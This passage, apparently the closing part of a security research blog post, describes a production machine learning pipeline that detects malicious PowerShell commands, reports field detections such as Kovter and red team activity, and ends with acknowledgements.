More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures but were detected by our machine learning model with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.